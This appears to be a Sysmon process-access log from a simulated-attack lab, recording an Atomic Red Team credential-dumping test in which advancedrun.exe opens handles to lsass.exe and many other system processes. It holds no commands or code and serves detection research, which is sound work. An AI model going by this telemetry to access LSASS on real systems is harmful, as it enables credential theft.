17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 